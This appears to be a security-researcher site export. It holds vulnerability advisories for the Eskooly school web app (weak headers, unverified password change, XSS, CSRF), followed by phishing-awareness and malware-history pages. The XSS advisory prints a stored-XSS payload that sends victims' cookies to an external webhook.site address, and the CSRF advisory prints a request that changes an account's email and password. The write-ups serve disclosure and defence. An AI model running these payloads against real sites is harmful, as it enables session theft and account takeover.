The likelihood of an exploit resulting from these misconfigurations is high, considering the prevalent use of automated tools and scripts that detect and exploit such vulnerabilities. The specific details of the website's traffic, user base, and content type can further influence this likelihood. High-profile or high-traffic websites are particularly attractive targets, increasing the probability of attacks. The simplicity of executing attacks like clickjacking, MIME sniffing, or SSL stripping (in the absence of HSTS) means that even less sophisticated attackers could successfully compromise the website's security. Moreover, the absence of policies like Permissions-Policy and Cross-Origin-Resource-Policy opens up additional avenues for unauthorized access and data theft, making it more likely that such vulnerabilities will be exploited if not promptly and adequately addressed.

## Recommendation

<figure><img src="/files/nOIB9lPjep0CE5lqHZcX" alt=""><figcaption></figcaption></figure>

## **References**

* [**OWASP: Secure Headers Project**](https://owasp.org/www-project-secure-headers/)
* [**CWE-693: Protection Mechanism Failure**](https://www.google.com/search?q=CWE-693%3A+Protection+Mechanism+Failure\&sourceid=chrome\&ie=UTF-8)
* [**OWASP: HTTP Security Response Headers Cheat Sheet**](https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html)


# CVE-2024-27715 - Inadequate Password Update Verification in Eskooly Web Product <= v3.0

<figure><img src="/files/hs8A48hSGYhtORKaZgfs" alt=""><figcaption></figcaption></figure>

## Introduction

Eskooly application's current process for updating passwords is insufficiently secure, as it only requires users to enter a new password and its confirmation, without asking for the current (old) password.

### Related Findings

* Broken Authentificaton
  * Weak password
  * Brute Force
  * Inadequate Password Update Verification

### **Technical Details**

1. Update Admin password

<figure><img src="/files/9zcRWrZiaiR5ng7fMiyC" alt=""><figcaption></figcaption></figure>

2. Update Teacher/Student

<figure><img src="/files/vxg4380cmOe4Tkf8cZHl" alt=""><figcaption></figcaption></figure>

## Risk&#x20;

### Impact

**High.**&#x20;

Given that the application hold critical and sensitive data, the impact of this vulnerability is extremely High. Successful exploitation allows attackers full access to all stored credentials, leading to potential identity theft and unauthorized access to various services. The ability to change passwords without the original one could lead to account takeovers and significant data breaches.

### Likelihood&#x20;

**High.**

The likelihood is medium because to exploit this vulnerability, the attacker must have access to the victim's current session, e.g. the victim has left his browser session open. The attacker will therefore be able to modify the victim's password without knowing the original.

## Recommendation

It is recommended to enhance the password update process by requiring users to input their current password before setting a new one. This step adds a crucial verification layer to ensure that only authorized users can change passwords.

## **References**

* [**A07:2021 – Identification and Authentication Failures** ](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)
* [**CWE-620: Unverified Password Change**](https://cwe.mitre.org/data/definitions/620.html)


# CVE-2024-27716 - Cross-site Scripting (XSS) in Eskooly Web Product <= v3.0

<figure><img src="/files/SfWMTtKloXtadJvsH6Mw" alt=""><figcaption></figcaption></figure>

## Introduction

Cross-Site Scripting (XSS) vulnerabilities are a common and serious threat to web applications, allowing attackers to inject malicious scripts into web pages viewed by other users. This post explores CVE-2024-27716, a critical XSS vulnerability in Eskooly Web Product v.3.0 that enables attackers to execute arbitrary code via message sending and user input fields.

## Discovery of the Vulnerability

A Cross-Site Scripting (XSS) attack consist in the injection of malicious scripts in websites pages. Such attack is useful to execute attacker stored malicious code, generally in the form of a browser side script, in a victim browser when this latter is viewing the affected page. Several XSS payloads exists to steal victim cookies or any other legitimate user browser information.&#x20;

In the application:

* it is possible to trigger a malicious XSS through messages send to Admin or Teacher (to steal a cookie for example), it’s a STORED XSS.
* it is possible to trigger a reflected XSS through a lot of boxes (student name, phone number, teacher,…)

### Related Findings

* Cross-Site Scripting (XSS)
  * Stored XSS
  * Reflected XSS

### **Technical Details**

The vulnerability arises from insufficient input sanitization and validation. Specifically, user inputs are not properly escaped or sanitized before being included in the HTML content of web pages, allowing attackers to inject and execute malicious scripts.

#### Stored XSS&#x20;

1. Shows an attacker (teacher or student for example) crafting a message with a malicious script that is designed to be stored and later executed.

* The payload:

```
<img src="XXXXXXX.jpg" onerror="var i=new Image; i.src='https://webhook.site/ede9XXXXXXXXXX/?'+document.cookie;" />
```

<figure><img src="/files/HKdL7HA1WTyyFgwdeQFJ" alt=""><figcaption></figcaption></figure>

2. Admin received the message

<figure><img src="/files/SUWWrfbTUEnBWwDmX5ms" alt=""><figcaption></figcaption></figure>

3. The request details of the stored XSS payload show that a request was made to an external domain, indicating that the malicious script has been executed and data, such as cookies, might have been exfiltrated.

<figure><img src="/files/UseZcqWsGWs6Cef3cMjl" alt=""><figcaption></figcaption></figure>

Also, the server does not appear to set any flags on the cookie, such as HttpOnly or Secure, which are critical for protecting the cookie from being accessed by client-side scripts or transmitted over non-HTTPS connections. (See [**CVE-2024-27713**](/eskooly-cve/cve-2024-27713-protection-mechanism-failure-in-eskooly-web-product-less-than-v3.0))

#### Reflected XSS

1. An alert box displays sensitive session information, indicating that the script execution can access and potentially exfiltrate user data.

<figure><img src="/files/P0Tj35VV4S7dKyXyFTgU" alt=""><figcaption></figcaption></figure>

## Risk&#x20;

### Impact

**High.**&#x20;

The attacker could potentially perform actions on behalf of the victim, access sensitive information, and compromise user accounts.

### Likelihood&#x20;

**High.**

The likelihood of exploitation for a XSS vulnerability is high due to its remote exploitability, low attack complexity, lack of required privileges, and the prevalence of known exploits. Especially in the context of the application, where it's possible to steal admin or teacher cookies as student.

## Recommendation

It's recommended to implement rigorous user input validation to treat all inputs as untrustworthy and apply strict semantic and syntactic checks, use data pattern whitelists and blacklists, and uniformly sanitize data from all users. Additionally, encoding dynamic content in HTTP responses is crucial to prevent misinterpretation as executable content, with special characters converted to HTML entity encodings for safe processing. Furthermore, deploying a robust Content Security Policy (CSP) is essential to control script sources and execution on web pages, thereby effectively mitigating potential reflected XSS attacks.

## **References**

* [**OWASP: Cross Site Scripting (XSS)**](https://owasp.org/www-community/attacks/xss/)
* [**OWASP: Cross Site Scripting Prevention Cheat Sheet**](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
* [**CWE-931: OWASP Top Ten 2013 Category A3 - Cross-Site Scripting (XSS)**](https://cwe.mitre.org/data/definitions/931.html)


# CVE-2024-27717 - Cross-Site Request Forgery (CSRF) in Eskooly Web Product <= v3.0

## Introduction

Cross-Site Request Forgery (CSRF) vulnerabilities are a significant threat to web applications, allowing attackers to perform unauthorized actions on behalf of authenticated users. This post explores CVE-2024-27717, a critical CSRF vulnerability in Eskooly Free Online School Management Software v.3.0 that enables attackers to escalate privileges via the Token Handling component.

## Discovery of the Vulnerability

CVE-2024-27717 was discovered during a detailed security assessment of Eskooly's web application. The vulnerability was identified in the token handling mechanism, where the application fails to implement sufficient measures to protect against CSRF attacks.

### Related Findings

* Cross-site Request Forgery

### **Technical Details**

The vulnerability arises from the lack of anti-CSRF tokens and improper handling of user sessions. Specifically, the application does not use unique, unpredictable tokens in state-changing requests, allowing attackers to trick authenticated users into performing unintended actions.

### Example of Impact

The impact of CVE-2024-27717 includes:

* Unauthorized actions performed on behalf of authenticated users.&#x20;
* Potential for attackers to escalate privileges and compromise user accounts.&#x20;
* Increased risk of data breaches and unauthorized data manipulation.&#x20;
* Compromise of sensitive user information and application integrity.

## Eskooly Application&#x20;

1. Update the account and password

-> POST Request:

```
POST /bb/account.php HTTP/2

Host: eskooly.com
--SNIP--

--SNIP--
email=HERE@MAIL.COM&password=1&timezone=Asia%2FKarachi&currency=2&symbol=%24&changepassword=

```

2. Craft the payload with the new mail and password

<figure><img src="/files/Ir6f5GtVjqi28CDmVeVC" alt=""><figcaption></figcaption></figure>

3. Send to admin and the victim triggered the attack

<figure><img src="/files/tFLMLp92IfwqKx1QnW55" alt=""><figcaption></figcaption></figure>

## Risk&#x20;

### Impact

**High.**&#x20;

The impact is high due to the nature of the actions that can be performed. Changing a user's password via CSRF can lock legitimate users out of their accounts and give attackers unauthorized access.

### Likelihood&#x20;

**High.**

In this specific context, where a CSRF attack allows password updates or change email of the victim, the likelihood is high.

## Recommendation

It’s recommended to:

1. Implement Anti-CSRF Tokens: Use unique, unpredictable anti-CSRF tokens in all forms and state-changing requests. These tokens ensure that only requests originating from your own website are accepted, effectively blocking forged requests from other sites.
2. SameSite Cookie Attribute: Utilize the SameSite attribute in cookies to restrict their sending to only first-party contexts, reducing the risk of CSRF attacks.

## **References**

* [**CWE-352: Cross-Site Request Forgery (CSRF)**](https://cwe.mitre.org/data/definitions/352.html)
* [**OWASP Top Ten 2013 Category A8 - Cross-Site Request Forgery (CSRF)**](https://cwe.mitre.org/data/definitions/936.html)
* [**OWASP: Cross-Site Request Forgery Prevention Cheat Sheet**](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)


# Phishing

This first part will define phishing, explain its origins and how it has evolved over the years, and provide tips on how to protect yourself and detect an attack.

## Definition and background

{% hint style="success" %}
Phishing is a cybercrime in which one or more targets are contacted by e-mail, telephone or SMS by an entity posing as a legitimate institution or person, in order to trick individuals into providing sensitive data such as personal identification information, bank or credit card details, and passwords.
{% endhint %}

![](/files/-MkK8iSfvgjiZWIClR5W)

This information is then used to access important accounts, and can lead to identity theft and financial loss.

To avoid falling prey to these scams yourself, it's useful to have a basic understanding of their history, how they work and, above all, how to recognize an attack of this type.

## Table of contents

| Title      | Description                                                      |
| ---------- | ---------------------------------------------------------------- |
| Origins    | Describes the origins of phishing since the first attack.        |
| Evolution  | The evolution of phishing from its inception to the present day. |
| Statistics | Phishing figures.                                                |
| Techniques | Phishing techniques used by cybercriminals.                      |
| Protection | How to detect phishing, protect yourself and file a complaint.   |


# Phishing - Origins

## Etymology

Phishing scams use spoofed e-mails and websites as bait to lure people into voluntarily disclosing sensitive information. The term phishing is a contraction of the English words “fishing” and “phreaking”, meaning the exploration, experimentation and study of telecommunication systems.

![](/files/-MkW8YNIcSC3ZRGl-dSm)

## Phishing sur America Online

In the 90s, AOL, formerly known as America Online, was one of the world's leading Internet service providers, with over a million customers subscribing to its service. AOL's massive popularity attracted the attention of hackers. People trading in pirated and illegal software and tools used AOL for their communications.

![AMERICA ONLINE supplier logo](/files/-MkWsZvpQLO3rhFanmYD)

Phishers first carried out attacks by stealing users' passwords and using algorithms to create random credit card numbers. While the chances of success were rare, they did hit the jackpot quite often, and caused a great deal of damage. Random credit card numbers were used to open AOL accounts. These accounts were then used to spam other users and for a host of other scams.

{% hint style="info" %}
Spammer: Anglicism. To send mass e-mail messages to unsolicited persons for advertising or commercial purposes. (Definition by “LeRobert”)
{% endhint %}

AOL put an end to this practice in 1995, when the company introduced security measures to prevent the use of randomly generated credit card numbers.

## New technique against AOL

After putting an end to their credit card extortion, the phishers created what would become a very common and long-lasting set of techniques. Using AOL's instant messaging and e-mail systems, they would send messages to users pretending to be AOL employees.

These messages asked users to verify their account or confirm their billing information. More often than not, people fell for it; after all, nothing like this had ever been done before. The problem intensified when phishers created AIM (AOL Instant Messenger) accounts via the Internet; these accounts could not be “punished” by AOL's terms of use service.

{% hint style="info" %}
AOL Instant Messenger (AIM): A computerized instant messaging and presence program created by AOL, enabling registered users to communicate in real time.
{% endhint %}

![Instant message on AIM for one of the latest versions available](/files/-MkXAq_RnXJZvNCPzf7G)

Finally, AOL was forced to include warnings on its e-mail and instant messaging clients to prevent people from providing sensitive information via this channel.


# Phishing - Evolution

## Years: 2003 - 2004

In late 2003, phishers registered dozens of domains that resembled legitimate sites such as eBay and PayPal. They used e-mail programs to send fraudulent e-mails to PayPal customers. These customers were directed to hacker sites and asked to update their credit card and other credentials.

![Phishing e-mail using Paypal's name and redirecting to a fraudulent site](/files/-MkXGr9O24q_IATOCu6s)

In early 2004, phishers enjoyed considerable success, particularly in attacking banking sites and their customers. Pop-up windows were used to obtain sensitive information from victims.

## Years: 2004 2005

Between May 2004 and May 2005, around 1.2 million users in the USA suffered losses caused by phishing, for a total of around $929 million. Organizations lose around $2 billion a year to phishing.

Phishing is officially recognized as a fully organized part of the black market. Specialized software capable of processing phishing payments is appearing on a global scale, externalizing a huge risk. This software is used in phishing campaigns by organized criminal gangs.

## Year: 2008

At the end of 2008, bitcoin and other crypto-currencies were launched. Transactions carried out using malware can now be secure and anonymous, changing the game for cybercriminals.


# Phishing - Statistics

## Crisis and Phishing

With the 2020 pandemic and crisis, phishing attacks have increased dramatically around the world. Cybercriminals have taken advantage of this to deceive and scam victims using current events.

### Worldwide figures

#### FBI

According to the FBI (Federal Bureau of Investigation) in their Internet Crime Report 2020, phishing was the most common type of cybercrime in 2020, and phishing incidents almost doubled in frequency, from 114,702 incidents in 2019, to 241,324 incidents in 2020.

**Phishing and society**

KnowBe4's phishing report revealed that the main sectors at risk vary according to company size, but that healthcare and manufacturing are among the most targeted, alongside education, construction, service companies and technology.

![KnowBe4 2020 statistics](/files/-MkZH2X5vfkul6hmD-JF)

**Belgium**

In 2020, Belgium saw an unprecedented increase in the number of phishing registrations: 7424 reports were drawn up, three times as many as in 2019. This sharp increase was most evident at the start of the coronavirus crisis, during March and April last year, before dropping slightly over the summer and fluctuating around 700 reports per month in the autumn.

![Belgian statistics on recorded phishing incidents](/files/-MkZHeTISuApj_haV2cm)

## TOP 10 of 2020

In their “Brand Phishing Report Q2 2021”, Check Point researchers have published their list of the top 10 most spoofed brands during phishing for the second quarter of 2021.

Microsoft was once again the brand most frequently targeted by cybercriminals, as in the first quarter of 2021 and the last of 2020.

![The brands most used in phishing attacks in the first and second quarters of 2021](/files/-MkiufNL4n7krVr0W4Oc)

The podium is therefore as follows for the second quarter of 2021:

1. Microsoft 45%&#x20;
2. DHL 26%&#x20;
3. Amazon 11%&#x20;
4. Bestbuy 4%&#x20;
5. Google 3%&#x20;
6. Linkedin 3%&#x20;
7. Dropbox 1%&#x20;
8. Chase 1%&#x20;
9. Apple 1%&#x20;
10. Paypal 1%


# Phishing - Techniques

There are a number of different techniques used to obtain personal information from users. As technology advances, so do the techniques used by cybercriminals.

To prevent phishing on the Internet, users need to know how criminals do it, and be aware of anti-phishing techniques to avoid falling victim.

This section presents the most common techniques.

## Spray-and-Pray

{% hint style="success" %}
Spray-and-Pray”, the technique by definition of phishing, consists of sending the same e-mail to as many users as possible, asking them to fill in personal data.
{% endhint %}

![](/files/-Ml0LR3TjWqSYLIe_0S4)

The most common phishing technique.

This information will be used by cybercriminals for their illegal activities. Most messages include an urgent note asking the user to enter credentials to update, modify or verify account data. Sometimes, the victim may be asked to fill in a form to access a new service via a link provided in the e-mail, such as a new Amazon, Netflix or other account.

### Examples

Mail from the Belgian National Police:

![Phishing e-mail asking you to pay a false fine.](/files/-Ml-MTC9QSfYqinD94rN)

#### Mail from bpost:

![False bpost mail.](/files/-Ml-MtDX4H6nFQCgYQyN)

#### Mail from the French government:

![Mail from the French government announcing the return of taxes.](/files/-Ml-O08jFS4b-T5gds5x)

## Spear Phishing

{% hint style="success" %}
Spear phishing” is an e-mail targeting a specific person or department within an organization, and appearing to come from a reliable source. In fact, it involves cybercriminals attempting to steal confidential information from the target in question.
{% endhint %}

![](/files/-Ml0KIx_RU_lDmkBo8l-)

Spear phishing is a highly targeted phishing method in which cybercriminals pose as a trusted source in order to convince victims to divulge confidential data, personal information or other sensitive details. The cybercriminal will then use this information for malicious purposes, including identity theft or data breaches.

Spear phishers often prey on their victims through targeted emails, social media, direct messaging apps, and other online platforms. The strength of these cyberattacks lies in the fact that they are tailor-made for the victims and that they favor quality over quantity unlike phishing (spray-and-pray).

## Examples

#### Mail personnel:

![](/files/-Ml0RYLjJVJ2nXAGcOiW)

## Phishing via search engines

{% hint style="success" %}
“Search engine phishing” occurs through online website search engines. The person may find offers or messages there that encourage them to visit the website. The search process may be legitimate, but the website is actually fake and exists only to steal the person's personal information.
{% endhint %}

![](/files/-Ml2WineTfakI0-y712k)

Some phishing scams involve search engines where the user is directed to sites that may offer products or services at low prices for example. When the user tries to purchase the product by entering their credit card details, these are collected by the phishing site. There are many fake banking sites that offer users cheap credit cards or loans, but they are actually scam sites.

### Examples

Here are some of the common tricks used by sites to lure victims:

* **Great Discount/Free Offer**

  These sites appear to be typical online retailers, but the products are fake and if you order something, you will never receive it. Instead, online fraudsters will take your money and probably your identity too.

* **Low interest rate/free credit card**

  Be wary of banking institutions offering incredibly low rates. These are likely fake sites designed to trick you into signing up or even transferring money from other sources.

* **Job offer**

  An online job search can turn up fake offers from companies that don't exist. The application will ask for personal information, for example a National Insurance number or bank details. No company should need this information before hiring you.

* **Emergency Warnings**

  Some sites use emergency warnings to encourage customers to download their products. Pop-ups tell you that your computer has been infected with malware or that your antivirus subscription has expired.

{% hint style="info" %}
Pop-up: De l'anglais "*to pup up*" qui signifie surgir.  Une pop-up parfois appelée **fenêtre** intruder, pop-up window or advertising window, is a secondary window which is displayed, without having been requested by the user, in front of the main navigation window when browsing the Internet. (Definition: Wikipedia)
{% endhint %}

## wishing

{% hint style="success" %}
&#x20;“Vishing” comes from two English words: Voice and phishing. This is a phishing technique that requires making a phone call.
{% endhint %}

![](/files/-Ml2WKVkwyUy-WFUzF-6)

Vishing involves convincing victims that they are doing the right thing by responding to the caller. Often the person calling claims that it is a call from the government, the tax office, the police or the victim's bank.

### Examples

1. **Telemarketing**

   These cybercriminals pretend to be calling from a legitimate company like one you are already a customer of or a company that offers deals you can't resist. For example:

   * A travel agency that offers you free vacations, all expenses paid.
   * A lottery that calls you to tell you that you have won a prize, even if you have never entered the contest.

2. **Government fraud**

   In this type of voice phishing attack, scammers pretend to belong to a government agency such as the Federal Public Service Finance (FPS Finance) or the police. They play on your fear and sense of urgency, telling you that you owe them money and need to pay them back immediately. Otherwise, you will be fined or worse.

3. **Fix a problem with your account**

   A caller who claims to be from your bank or another organization you do business with, explains that there is a problem with access to your account, a payment you recently made, suspicious transactions or perhaps be a refund owed to you. The caller asks for information, such as your passcode or account number, to resolve the problem.

## Smishing

{% hint style="success" %}
“Smishing” comes from SMS and phishing. It is a fraudulent practice of sending text messages pretending to be from reputable companies in order to trick people into revealing personal information, such as passwords or credit card numbers.
{% endhint %}

Phishing carried out via SMS (Short Message Service), a telephone text messaging service.

Deception and fraud are essential elements of any SMS phishing attack. As the cybercriminal adopts an identity that you could trust, you are more likely to succumb to their demands.

## Examples

**SMS from bpost:**

![](/files/-Ml5MNie6jLWdKRhm53l)

**SMS from BASE:**

![](/files/-Ml5MdTSLPJf63hWe7yN)

**SMS for a COVID study in France:**

![](/files/-Ml5MmxsVBEq4w8wpbfz)


# Phishing - Protection

Cybercriminals use emails or text messages to trick you into providing them with personal information. They may attempt to steal your passwords, account numbers, or other sensitive information. If they obtain this information, they could have access to your email, bank account or other accounts. Every day, scammers launch thousands of such phishing attacks and they are often successful.

Cybercriminals sometimes change their strategies, but there are some clues that will help you identify the fraudulent message or email.

## Detect phishing

Everyone is susceptible to a phishing attack. Often, phishing emails are well designed and it takes a trained eye to distinguish real from fake. 👀

![](/files/-Ml9TLM3uOuMKqF6m0Tv)

### 1. Name and email address

Email addresses and domain names can be easily spoofed. It is therefore essential to check that the domain name is not altered by spelling changes in suspicious emails. Even if they appear to come from a trusted sender, always check twice.

![Fraudulent email address.](/files/-MlBVS2KsSlkyuEQTLLg)

### 2. Check for spelling mistakes

Cybercriminals are often less concerned with being grammatically correct. This means that typos and spelling errors are often evident in posts. Such errors in an email can be a good indication that the message is not authentic.

![Pay attention to French mistakes in emails.](/files/-MlB_lOnx_F8WHMkdui5)

### 3. Don't share sensitive information in a hurry

Any email asking for sensitive information about you or your business is suspicious. For example, no bank will ever ask for personal information via email. Call your bank directly to check whether an email is genuine or not.

![Pay attention to the information requested from you by email.](/files/-MlEMhICyoBF5LoepLwn)

### 4. Don't be fooled by the URGENT side

Phishing attacks use fear tactics such as urgency and authority to trick victims into taking immediate action. Emails that ask to share personal information or make cash transactions are traps!

![The urgency of closing the account may push you to react to the email.](/files/-MlGgcBW1Ce0WXxpp1fg)

### 5. Hover without clicking on links

Hover over the URLs. If the alt text does not match the displayed text, or if it looks strange, DO NOT click on it.

![The link sends to a false address.](/files/-MlHSx3r6DQ8Tcie8M9l)

### 6. Pay attention to attachments

Mouse over attachments to see if they contain a real link, before clicking or downloading them. But if you're still not sure who the sender is, don't click the link or file.

### 7. Is the email too good to be true?

If it sounds too good to be true, chances are it is! Phishing attacks use fake rewards to trick victims into taking action. You wouldn't win the lottery if you never entered.

![](/files/-MlHYOXPjFn1xFOz-GyB)

### 8. Keep your devices up to date

Devices, and the applications they contain, are more vulnerable to attacks when systems are not updated. Keep your antivirus up to date and check your devices regularly for updates.

### 9. Check your accounts regularly

Check your accounts regularly to ensure that no changes have been made without your knowledge. By staying on top of your accounts and knowing what data is kept on each one, it will be easier to spot a phishing attack.

### 10. If any doubt persists, contact the right people

If you think you have been the victim of a phishing attack, there are several points of contact if you are particular. (See: Contact points)

If you are a victim of phishing in your workplace, speak directly to your cybersecurity team, IT team or your manager.

## Points de contact

### Belgium

* The CCB (Center for Cybersecurity Belgium) has set up an email address <suspect@safeonweb.be> to voluntarily report phishing emails.

{% hint style="info" %}
"The goal of <suspect@safeonweb.be> is simple: we call on Internet users to voluntarily report suspicious messages they receive to this address, the famous phishing messages. We then check the URLs and annexes of these messages sent. This is an automated process. We block suspicious links. This system helps protect less vigilant Internet users who have clicked on the link. Source: Safeonweb.be
{% endhint %}

* The FPS Economy has set up a contact point for all fraud, deception, scams and scams via the following link: <https://pointdecontact.belgique.be/meldpunt/fr/bienvenue>

{% hint style="info" %}
When your rights as a consumer or business have been violated or you are the victim of some form of deception, you can report it via this new site. The point of contact gives a tailor-made opinion and directs you to the appropriate body. The contact point is the result of collaboration between the Federal Agency for the Safety of the Food Chain (AFSCA), the Federal Agency for Medicines and Health Products (FAMHP), the Social Information and Research Service (SIRS), the Federal Police, the FPS Finance and the FPS Economy.

Source: Safeonweb.be
{% endhint %}

### France

#### Cybermalveillance

The French government has set up the following site:

* Cybermalveillance.gouv.fr's mission is to assist individuals, businesses, associations, communities and administrations who are victims of cybercrime, to inform them about digital threats and the means to protect themselves from them.

On this site, there is a section dedicated to phishing and how to react when you are a victim.

{% hint style="info" %}

1. If in doubt, contact the organization concerned: If in doubt, if possible, contact the organization concerned directly to confirm the message or call you received.
2. Objection immediately: if you have accidentally communicated information about your means of payment or if you have noticed fraudulent debits on your account, object immediately to your banking or financial institution.
3. Keep the evidence and, in particular, the phishing message received.
4. File a complaint: if you have noticed that personal information is being used to usurp your identity or if you notice fraudulent debits from your bank accounts, file a complaint with the police station or gendarmerie brigade to which you report. You can also send your complaint in writing to the public prosecutor of the judicial court where you belong, providing all the evidence in your possession. If you are an individual, you can be supported free of charge in this process by a France Victimes association at 116 006 (free call and service), victim assistance number of the Ministry of Justice. Service open 7 days a week from 9 a.m. to 7 p.m.
5. Change your passwords immediately: If you have accidentally given a password, change it immediately on the site or service concerned, as well as on all other sites or services on which you used this compromised password.
6. Report any questionable messages or sites to Signal Spam: if you have received a questionable message, do not click on the attachments or on the suspicious link. If the message includes a link, position your mouse cursor on this link (without clicking). This will then display the real address it redirects to in order to verify its plausibility.\
   \
   If you clicked on the link, check the website address that appears in your browser. If this does not exactly match the site in question, it is most likely a fraudulent site. Sometimes a single character may change in the site address to mislead you. Do not respond to these suspicious messages and report them to Signal Spam, which is associated with the CNIL to identify the main senders of spam and take the necessary countermeasures.
7. Report the address of a phishing site to the Phishing Initiative: check the website address that appears on your browser. If it does not correspond exactly to the site concerned, it is most certainly a fraudulent site. Sometimes a single character may change in the site address to mislead you. When faced with a suspicious site, you can report it to the Phishing Initiative which will block the address of this site and request its removal.
8. Need more advice? To be advised in your efforts, contact the Info Escroqueries platform of the Ministry of the Interior on 0 805 805 817 (free call and service from 9 a.m. to 6:30 p.m. Monday to Friday).

**Source:** Cybermailvaillance.gouv.fr
{% endhint %}

* The CNIL (National Commission for Information Technology and Liberties) indicates how to react to phishing SMS messages:

{% hint style="info" %}
You can forward the abusive SMS to the number 33700. This is an SMS alert system created by telecom operators, service providers and hosts, in consultation with the State Secretariat for Industry and Consumption.

After this transfer, you will receive a message asking you to send the number from which you received the abusive SMS to 33700. This information is transmitted to operators, including yours, who can act quickly with the organizations originating these text messages.

Sending an SMS to 33700 is free for Bouygues Telecom, Orange and SFR customers. For other operators, sending an SMS to 33700 can be done at the price of a normal SMS.

For more information, you can connect to [www.33700-spam-sms.fr](http://www.33700-spam-sms.fr)

Source: [**CNIL.fr**](https://www.cnil.fr/fr/spam-phishing-arnaques-signaler-pour-agir)
{% endhint %}


# Malware

This first part will define malware, explain its origin as well as its evolution over the years, and give instructions on how to protect yourself and detect an attack.

## Definition and Context

{% hint style="success" %}
Malicious software or malware is software designed intentionally to disrupt a computer, server, client or computer network, disclose private information, gain unauthorized access to information or systems, deprive users of access to information or which, without its knowledge, undermines the IT security and privacy of the user.

**Definition:** MICROSOFT
{% endhint %}

![](/files/dpuKN9AvETdtVPlDbC6R)

Hostile, intrusive and intentionally malicious, malware seeks to invade, damage or disable computers, IT systems, networks, tablets and mobile devices, often by taking partial control of a device's operations. Like the human flu, it interferes with normal functioning.


# Malware - Origines

## Etymology

As software designed to disrupt the normal operation of a computer, malware is a general term for viruses, Trojan horses, and other destructive computer programs used by threat actors to infect systems and networks in order to access sensitive information or block the system completely.

The word malware comes from the English MALICIOUS SOFTWARE which means “malicious software”. In French, we find the term Maliciel which is short for Malicious Software.

![](/files/2Q0KHqf8uYoMGgxyspnV)

Early malware was primitive, often spreading entirely offline via floppy disks carried from computer to computer by human hands. With the development of networks and the Internet, malware authors were quick to adapt their malicious code and take advantage of this new means of communication.

Here is a representative list of some of the important early malware releases and their impact on the world.

## Creeper - 1971

An experimental computer network, ARPANET, was created in 1969 and was the precursor to the Internet. It was designed to send computer-to-computer communications over long distances, without the need for a dedicated telephone connection between each computer. To achieve this required a method of splitting and sending data, known today as packet switching. Its first users, few in number, were mostly computer scientists.

{% hint style="info" %}
**ARPANET**:

"Advanced Research Projects Agency Network" is the acronym for the first data packet transfer network designed in the United States by the Defense Advanced Research Projects Agency (DARPA). The project was launched in 19662, but ARPANET did not see the light of day until 1969. Its first official demonstration dates from October 1972.

In 1983, Internet Protocol (TCP/IP) replaced NCP as the primary protocol of ARPANET. The ARPANET then became a subnetwork of the first Internet.

Definition: Wikipedia
{% endhint %}

Imagine their surprise when one day in 1971, computer screens connected by teletype displayed the phrase: “I’m the creeper, catch me if you can!”.

![](/files/x4H0efHy0JNrH8LstzMs)

Without knowing it at the time, they were the first victims of a computer virus.

**But what did this mysterious message mean, and who sent it?**

It turns out that it wasn't a hacker who coded the first computer virus, and it wasn't sent with malicious intent. Bold, Beranek and Newman (now Raytheon BBN Technologies) were pioneers of packet switching networks like ARPANET and the Internet. One of its researchers, Bob Thomas, had created Creeper as an experimental computer program.

Creeper was a worm - a type of computer virus that replicates and spreads to other systems. In this case, his targets were Digital Equipment Corporation (DEC) computers that were linked to ARPANET.

But it wasn't malware like we associate with today's computer viruses; Creeper was only displaying his cryptic message. It did not encrypt files, demand ransom, destroy data, or steal information. He only displayed his provocative defiance.

Its creator had simply wanted to create an experimental program that self-destructed to show that it was possible. If he did it primarily out of scientific curiosity, he also had fun giving it a name: Creeper was a mysterious green and macabre bank robber in the famous 70s cartoon, "Scooby-Doo".

![Jeepers it's the creeper - Scooby-Doo](/files/m79CbrbYUQLzpfeIzWj2)

### The birth of Reaper

The development of the Creeper virus gave rise to Ray Tomlinson's Reaper, the first antivirus software designed to stop threats of this type. Interestingly, Reaper itself is a computer worm programmed to delete all instances of Creeper in infected computers.


# Malware - Evolution

Since Creeper to date, several malware have emerged.

In this section, a brief overview of the history and evolution of malware over time.

This list is of course not exhaustive, there are so many different malwares!

A summary of malware can be found HERE

## Years: 1970 - 1999

### 1975 - ANIMAL

A program called ANIMAL, released in 1975, is generally considered the world's first example of a "TROJAN HORSE" attack.

When ANIMAL is run, it asks twenty questions for clues and attempts to guess an animal the user is thinking of. ANIMAL searches for directories that the current user has access to. If the directory does not contain an up-to-date version of Animal, it will copy itself to this directory. It will overwrite any older version of Animal, but will take care not to remove other programs.

ANIMAL creator John Walker dropped the program in San Francisco, and after about a week he was in Washington DC.

![](/files/z2OWVzi86jXV8ZFC0XUF)

It is unlikely that Animal caused any measurable damage. The program did not contain any deliberately malicious code and did not even exploit any system vulnerabilities. It even took care not to affect any of the user's programs.

### 1982 - ELK CLONE

The widespread use of Apple II computers predetermined the fate of this machine by attracting the attention of virus writers. It is not surprising that the first large-scale computer virus outbreak in history occurred on the Apple II platform.

Elk Cloner was created by Rich Skrenta as a prank in 1982. Skrenta already had a reputation as a prankster among his friends because, while sharing computer games and software, he would often modify floppy disks so that they would turn off or display mocking messages on the screen.

Elk Cloner spread by infecting the Apple II operating system, stored on floppy disks. When the computer was booted from an infected floppy disk, a copy of the virus would automatically boot. The virus did not normally affect computer operation except to monitor disk access. If an uninfected floppy disk was accessed, the virus copied itself onto the floppy disk and infected it as well, slowly spreading from floppy disk to floppy disk.

Elk Cloner virus has infected the boot sector of Apple II computers. At the time, operating systems were stored on floppy disks: the floppy disks were therefore infected and the virus was launched each time the machine was started. Users were surprised by the side effects and often infected their friends by sharing their floppy disks, because most people had no idea what viruses were, much less how they spread.

The Elk Cloner virus included rotating images, flashing text, and humorous messages in poem form:

![](/files/bT3qSoZJ24OzB1BDVLeI)

The message read:

> ELK CLONER (Definition: Someone who creates clones):
>
> THE PROGRAM WITH A PERSONALITY
>
> IT WILL INSTALL ON ALL YOUR DISKS
>
> IT WILL GET INTO YOUR CHIPS
>
> YES IT’S A CLONE!
>
> IT WILL STICK TO YOU LIKE GLUE
>
> IT WILL ALSO MODIFY THE RAM
>
> SEND HIM CLONE!

### 1983 - VIRUS&#x20;

In 1983, the term "virus" was first coined by Frederick Cohen (also known as Fred Cohen) and his colleague Leonard Adleman (also known as Len Adleman) to describe self-replicating programs.

